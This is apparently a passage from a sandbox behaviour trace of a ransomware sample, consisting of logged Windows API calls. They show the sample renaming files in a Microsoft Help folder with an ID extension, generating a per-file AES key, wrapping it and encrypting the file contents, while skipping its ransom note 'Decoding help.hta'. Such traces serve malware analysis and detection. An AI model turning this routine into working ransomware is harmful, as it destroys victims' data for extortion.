lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x6c4fcf8*=0x500, lpOverlapped=0x0) returned 1 [0039.437] CloseHandle (hObject=0x1e8) returned 1 [0039.438] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0039.438] FindNextFileW (in: hFindFile=0x5a54f0, lpFindFileData=0x6c4fd30 | out: lpFindFileData=0x6c4fd30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xfa72fc10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa72fc10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa7a2030, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.EXCEL.14.1033.hxn", cAlternateFileName="MSEXCE~1.HXN")) returned 1 [0039.438] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" [0039.438] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned 37 [0039.438] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta" [0039.439] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft help\\decoding help.hta")) returned 0x1 [0039.439] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MS.EXCEL.14.1033.hxn") returned -1 [0039.439] lstrlenW (lpString="MS.EXCEL.14.1033.hxn") returned 20 [0039.439] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" [0039.439] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned 37 [0039.439] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\", lpString2="MS.EXCEL.14.1033.hxn" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn" [0039.439] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn" [0039.439] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" [0039.439] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft help\\ms.excel.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0039.450] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft help\\ms.excel.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0039.450] CreateFileMappingA (hFile=0x1d8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0039.450] CryptAcquireContextA (in: phProv=0x6c4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6c4fcec*=0x5b0220) returned 1 [0039.451] CryptGenKey (in: hProv=0x5b0220, Algid=0x6610, dwFlags=0x1, phKey=0x6c4fce8 | out: phKey=0x6c4fce8*=0x5a5530) returned 1 [0039.451] CryptExportKey (in: hKey=0x5a5530, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x6c4fbe4, pdwDataLen=0x6c4fce4 | out: pbData=0x6c4fbe4*, pdwDataLen=0x6c4fce4*=0x2c) returned 1 [0039.451] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x2d0000 [0039.452] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6c4fbe4*, pdwDataLen=0x6c4fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x6c4fbe4*, pdwDataLen=0x6c4fcf8*=0x100) returned 1 [0039.452] CryptEncrypt (in: hKey=0x5a5530, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0x6c4fce4*=0x140, dwBufLen=0x140 | out: pbData=0x2d0000*, pdwDataLen=0x6c4fce4*=0x140) returned 1 [0039.452] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0039.453] CloseHandle (hObject=0x128) returned 1 [0039.453] CryptDestroyKey (hKey=0x5a5530) returned 1 [0039.453] CryptReleaseContext (hProv=0x5b0220, dwFlags=0x0) returned 1 [0039.453] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.453] WriteFile (in: hFile=0x1d8, lpBuffer=0x6c4fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x6c4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x6c4fbe4*, lpNumberOfBytesWritten=0x6c4fcf8*=0x100, lpOverlapped=0x0) returned 1 [0039.454] WriteFile (in: hFile=0x1d8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x6c4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x6c4fcf8*=0x500, lpOverlapped=0x0) returned 1 [0039.454] CloseHandle (hObject=0x1d8) returned 1 [0039.455] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0039.455] FindNextFileW (in: hFindFile=0x5a54f0, lpFindFileData=0x6c4fd30 | out: lpFindFileData=0x6c4fd30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xfa755d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa755d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa7a2030, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.EXCEL.DEV.14.1033.hxn", cAlternateFileName="MSEXCE~2.HXN")) returned 1 [0039.455] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" [0039.455] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned 37 [0039.456] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta" [0039.456] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft help\\decoding help.hta")) returned 0x1 [0039.456] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MS.EXCEL.DEV.14.1033.hxn") returned -1 [0039.456] lstrlenW (lpString="MS.EXCEL.DEV.14.1033.hxn") returned 24 [0039.456] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" [0039.456] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned 37 [0039.456] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\", lpString2="MS.EXCEL.DEV.14.1033.hxn" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" [0039.456] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" [0039.456] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" [0039.456] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.dev.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft help\\ms.excel.dev.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0039.456] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft help\\ms.excel.dev.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0039.457] CreateFileMappingA (hFile=0x1d8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0039.457] CryptAcquireContextA (in: phProv=0x6c4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6c4fcec*=0x5b0220) returned 1 [0039.457] CryptGenKey (in: hProv=0x5b0220, Algid=0x6610, dwFlags=0x1, phKey=0x6c4fce8 | out: phKey=0x6c4fce8*=0x5a55b0) returned 1 [0039.457] CryptExportKey (in: hKey=0x5a55b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x6c4fbe4, pdwDataLen=0x6c4fce4 | out: pbData=0x6c4fbe4*, pdwDataLen=0x6c4fce4*=0x2c) returned 1 [0039.457] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x2d0000 [0039.459] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6c4fbe4*, pdwDataLen=0x6c4fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x6c4fbe4*, pdwDataLen=0x6c4fcf8*=0x100) returned 1 [0039.459] CryptEncrypt (in: hKey=0x5a55b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0x6c4fce4*=0x140, dwBufLen=0x140 | out: pbData=0x2d0000*, pdwDataLen=0x6c4fce4*=0x140) returned 1 [0039.459] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0039.460] CloseHandle (hObject=0x128) returned 1 [0039.460] CryptDestroyKey (hKey=0x5a55b0) returned 1 [0039.460] CryptReleaseContext (hProv=0x5b0220, dwFlags=0x0) returned 1 [0039.460] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.460] WriteFile (in: hFile=0x1d8, lpBuffer=0x6c4fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x6c4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x6c4fbe4*, lpNumberOfBytesWritten=0x6c4fcf8*=0x100, lpOverlapped=0x0) returned 1 [0039.461] WriteFile (in: hFile=0x1d8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x6c4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x6c4fcf8*=0x500, lpOverlapped=0x0) returned 1 [0039.461] CloseHandle (hObject=0x1d8) returned 1 [0039.462] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0039.462] FindNextFileW (in: hFindFile=0x5a54f0, lpFindFileData=0x6c4fd30 | out: lpFindFileData=0x6c4fd30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.GRAPH.14.1033.hxn", cAlternateFileName="MSGRAP~1.HXN")) returned 1 [0039.462] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" [0039.462] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned 37 [0039.462] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta" [0039.462] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft help\\decoding help.hta")) returned 0x1 [0039.462] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MS.GRAPH.14.1033.hxn") returned -1 [0039.462] lstrlenW (lpString="MS.GRAPH.14.1033.hxn") returned 20 [0039.462] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" [0039.462] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned 37 [0039.462] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\", lpString2="MS.GRAPH.14.1033.hxn" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn" [0039.462] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn" [0039.462] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" [0039.462] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.graph.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft help\\ms.graph.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0039.482] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft help\\ms.graph.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0039.482] CreateFileMappingA (hFile=0x198, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x18c [0039.482] CryptAcquireContextA (in: phProv=0x6c4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6c4fcec*=0x5b0220) returned 1 [0039.483] CryptGenKey (in: hProv=0x5b0220, Algid=0x6610, dwFlags=0x1, phKey=0x6c4fce8 | out: phKey=0x6c4fce8*=0x5a55b0) returned 1 [0039.483] CryptExportKey (in: hKey=0x5a55b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x6c4fbe4, pdwDataLen=0x6c4fce4 | out: pbData=0x6c4fbe4*, pdwDataLen=0x6c4fce4*=0x2c) returned 1 [0039.483] MapViewOfFile (hFileMappingObject=0x18c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x2d0000 [0039.488] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6c4fbe4*, pdwDataLen=0x6c4fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x6c4fbe4*, pdwDataLen=0x6c4fcf8*=0x100) returned 1 [0039.488] CryptEncrypt (in: hKey=0x5a55b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0x6c4fce4*=0x140, dwBufLen=0x140 | out: pbData=0x2d0000*, pdwDataLen=0x6c4fce4*=0x140) returned 1 [0039.488] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0039.489] CloseHandle (hObject=0x18c) returned 1 [0039.489] CryptDestroyKey (hKey=0x5a55b0) returned 1 [0039.489] CryptReleaseContext (hProv=0x5b0220, dwFlags=0x0) returned 1 [0039.489] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.489] WriteFile (in: hFile=0x198, lpBuffer=0x6c4fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x6c4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x6c4fbe4*, lpNumberOfBytesWritten=0x6c4fcf8*=0x100, lpOverlapped=0x0) returned 1 [0040.504] WriteFile (in: hFile=0x198, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x6c4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x6c4fcf8*=0x500, lpOverlapped=0x0) returned 1 [0040.504] CloseHandle (hObject=0x198) returned 1 [0040.505] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0040.505] FindNextFileW (in: hFindFile=0x5a54f0, lpFindFileData=0x6c4fd30 | out: lpFindFileData=0x6c4fd30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xfd789af0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd789af0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfd822070, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x14c, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.GROOVE.14.1033.hxn", cAlternateFileName="MSGROO~1.HXN")) returned 1 [0040.506] lstrcpyW (in: lpString1=0x9a63000, lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" [0040.506] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned 37 [0040.506] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta" [0040.506] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft help\\decoding help.hta")) returned 0x1 [0040.506] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MS.GROOVE.14.1033.hxn") returned -1 [0040.506] lstrlenW (lpString="MS.GROOVE.14.1033.hxn") returned 21 [0040.506] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" [0040.506] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned 37 [0040.506] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\", lpString2="MS.GROOVE.14.1033.hxn" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn" [0040.506] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn" [0040.506] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" [0040.506] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.groove.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft help\\ms.groove.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0040.506] FindNextFileW (in: hFindFile=0x5a54f0, lpFindFileData=0x6c4fd30 | out: lpFindFileData=0x6c4fd30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x113ae4d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x113ae4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x11446a50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.INFOPATH.14.1033.hxn", cAlternateFileName="MSINFO~1.HXN")) returned 1 [0040.506] lstrcpyW (in: lpString1=0x9a63000, lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" [0040.506] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned 37 [0040.506] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta" [0040.506] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft help\\decoding help.hta")) returned 0x1 [0040.506] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MS.INFOPATH.14.1033.hxn") returned -1 [0040.506] lstrlenW (lpString="MS.INFOPATH.14.1033.hxn") returned 23 [0040.506] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" [0040.507] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned 37 [0040.507] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\", lpString2="MS.INFOPATH.14.1033.hxn" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" [0040.507] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" [0040.507] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" [0040.507] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopath.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft help\\ms.infopath.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.178] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft 